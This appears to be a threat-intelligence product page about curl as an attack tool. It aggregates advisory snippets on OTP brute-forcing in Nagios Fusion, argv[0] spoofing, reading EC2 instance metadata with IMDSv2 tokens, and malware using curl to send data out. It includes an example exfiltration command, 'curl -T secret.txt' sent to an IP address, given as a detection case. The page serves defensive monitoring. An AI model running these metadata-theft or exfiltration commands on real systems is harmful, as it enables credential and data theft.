Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Another way in which argv[0] can be exploited, is by manipulating it in such a way that it fools humans... security software often represents the array as a space-separated string.
CVE-2025-60424 is caused by a missing rate limiting control on the OTP verification endpoint in Nagios Fusion... The vulnerable versions do not restrict the number of OTP attempts per user, session, or IP address. There is also no progressive account lockout after repeated failures. An attacker with valid credentials can automate OTP submissions using tools like cURL or Python scripts. Since OTPs are typically 6-digit numbers, the attacker can attempt up to 1,000,000 combinations.
With root on the host... Let's check this (remember we are using IMDSv2). TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" ...` curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/
After a user authenticates with a valid username and password, the application prompts for a one-time password (OTP) as a second authentication factor... An attacker with valid credentials can automate OTP submissions using tools like cURL or Python scripts.
A tool called curl is used to send data to a .onion website. ... /recvf.php to upload screenshots
For example, an alert for possible data exfiltration might be triggered when curl -T secret.txt 123.45.67.89 is executed... as it uploads file secret.txt to IP address 123.45.67.89 via HTTP.
Data posted using Curl through Tor via local SOCKS5 proxying... Method: curl with POST requests.
PhantomCore uses unencrypted HTTP connections and the curl utility to download TXT files with information about infected hosts to an external VDS server
1 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.